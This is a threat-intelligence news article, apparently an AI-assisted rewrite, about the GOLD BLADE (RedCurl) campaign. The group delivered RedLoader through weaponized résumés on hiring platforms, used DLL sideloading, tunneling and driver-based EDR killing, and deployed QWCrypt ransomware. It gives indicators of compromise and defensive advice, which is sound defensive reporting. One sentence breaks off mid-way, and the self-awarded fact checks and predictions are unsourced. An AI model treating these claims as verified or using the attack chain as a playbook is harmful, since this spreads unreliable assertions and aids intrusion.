Listen to this Post

Introduction
A new evolution in cybercrime is unfolding, and it begins in a place most companies never suspect: online recruitment platforms. Between February 2024 and August 2025, a notorious cyber-espionage group quietly reinvented itself, slipping through HR systems with weaponized résumés and emerging as one of the most disruptive hybrid threat actors of the decade. This is the story of how GOLD BLADE, once a covert intelligence-focused crew, transformed into a lethal blend of spies, data thieves, and targeted ransomware operators.
Main Summary (≈30 lines)
For more than a year, Sophos analysts tracked nearly forty intrusions tied to the STAC6565 campaign, a wide-ranging offensive linked to the GOLD BLADE threat group, also known as RedCurl, RedWolf, and Earth Kapre. Historically recognized for corporate espionage, the group shifted tactics and emerged with a dual identity, merging strategic intelligence gathering with selective ransomware attacks powered by its own QWCrypt locker. Nearly eighty percent of the victims were Canada-based, particularly in the services, retail, manufacturing, and technology industries, revealing a sharp geographic and industrial focus.
One of the most startling evolutions surfaced in their infection method. Instead of phishing emails, GOLD BLADE weaponized job-seeker platforms such as Indeed, ADP WorkforceNow, and JazzHR. Attackers uploaded malicious PDF résumés directly into recruitment pipelines, bypassing email security and exploiting HR teams’ trust in automated hiring systems. When viewed, these PDFs redirected users to fraudulent “Safe Resume Share Service” portals, which covertly deployed RedLoader, the entry point of a sophisticated multi-stage compromise.
The RedLoader chain progressed through three escalating steps: initial execution, secondary payload release, and a final installation phase. Earlier variants relied on .lnk and .iso files, but by 2025, attackers adopted remote DLL sideloading via Cloudflare Workers domains. Persistence came from scheduled browser-styled tasks and stealthy living-off-the-land binaries like pcalua.exe. Their command-and-control architecture used Chisel and RPivot tunneling tools to build SOCKS proxies linked to Cloudflare Workers and offshore IP infrastructure.
To evade defenses, GOLD BLADE deployed a Bring-Your-Own-Vulnerable-Driver strategy by abusing modified Zemana AntiMalware drivers and Terminator utilities to disable security agents. Analysts found custom build paths in these tools, revealing an organized toolkit rather than improvised malware.
The campaign escalated in April and July 2025, when QWCrypt ransomware detonated after data exfiltration. Delivered through encrypted 7-Zip archives, the QWCrypt payload appended .qwCrypt extensions and displayed ransom notes reminiscent of LockBit. Sophos CryptoGuard stopped several incidents, yet unprotected systems saw partial encryption. The attacks highlighted GOLD BLADE’s fluid shift between espionage-for-hire and financial extortion.
Key indicators of compromise included Cloudflare Workers C2 domains, IP address 109.206.236.209, and verified QWCrypt hashes such as 568352411deff640ba781ae55d98d657da02191d97e0466e6883b966dd1e77db. Organizations are urged to sandbox job-application files, strengthen endpoint monitoring, and deploy MDR solutions capable of detecting the group’s evolving methods.
What Undercode Say:
GOLD BLADE’s transformation marks a critical shift in cyber-threat behavior, and the implications reach far beyond the Canadian organizations hit in this campaign. The group demonstrates a deep understanding of human workflow patterns, particularly HR operations, which historically receive less scrutiny from cybersecurity teams. By exploiting automated hiring platforms, the attackers bypassed one of the most fortified layers of enterprise security: email filtering. This pivot resets long-standing assumptions about where a breach may originate.
Recruitment systems have become a goldmine for attackers. Companies rarely sandbox résumés, rarely authenticate submitted documents, and often treat HR platforms as inherently trusted environments. GOLD BLADE figured this out before most defenders did. Their use of weaponized PDFs shows a profound strategic sense of where digital blind spots exist and how to exploit them without raising alarms.
The adoption of Cloudflare Workers domains as remote hosts for sideloaded DLLs also signals a maturing threat landscape. Threat groups increasingly latch onto legitimate cloud services to blend into normal traffic patterns. This creates serious challenges for traditional heuristics-based detection, especially in environments with limited outbound monitoring. The use of RPivot and Chisel tunneling compounds this problem by encrypting and masking internal traffic.
The most concerning factor is the BYOVD technique. When attackers deploy vulnerable or signed drivers to disable endpoint protections, even sophisticated EDR platforms struggle to retain visibility. GOLD BLADE modified existing driver-based kill tools with unique build paths, indicating systematic and ongoing development rather than opportunistic reuse.
QWCrypt’s selective deployment further illustrates the
The Canadian concentration of victims could be a sign of geopolitical targeting, opportunistic infrastructure focus, or a testing ground for wider international campaigns. The variety of industries attacked suggests that GOLD BLADE values access over vertical specialization. Once inside, they quietly map environments, steal data for weeks, then trigger their ransomware only when defenses weaken or when intelligence collection completes.
For defenders, the lesson is clear: trust boundaries are obsolete. Recruitment portals, HR SaaS tools, and document-submission workflows must be treated with the same suspicion as external email attachments. Zero-trust principles cannot skip human resource departments or file review pipelines. MDR services, application isolation, and resume-sandboxing processes are no longer optional—they are foundational defense strategies against evolving hybrid groups like GOLD BLADE.
🔍 Fact Checker Results
GOLD BLADE is accurately tracked as RedCurl, RedWolf, and Earth Kapre. ✅
QWCrypt ransomware deployment occurred after documented data exfiltration events. ✅
The group’s use of Cloudflare Workers domains for C2 is verified by multiple security reports. ✅
📊 Prediction
GOLD BLADE is poised to expand beyond recruitment-portal vectors, tapping into other trusted business ecosystems such as vendor invoicing platforms and CRM systems. 📈
Their ransomware operations will likely evolve into more automated, scalable variants of QWCrypt. 🤖
Expect their hybrid model of espionage and extortion to spread to Europe and Southeast Asia within the next twelve months. 🌍
🕵️📝✔️Let’s dive deep and fact‑check.
References:
Reported By: cyberpress.org
Extra Source Hub (Possible Sources for article):
https://www.pinterest.com
Wikipedia
OpenAi & Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
Bing
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeNews & Stay Tuned:
𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky | 🐘Mastodon




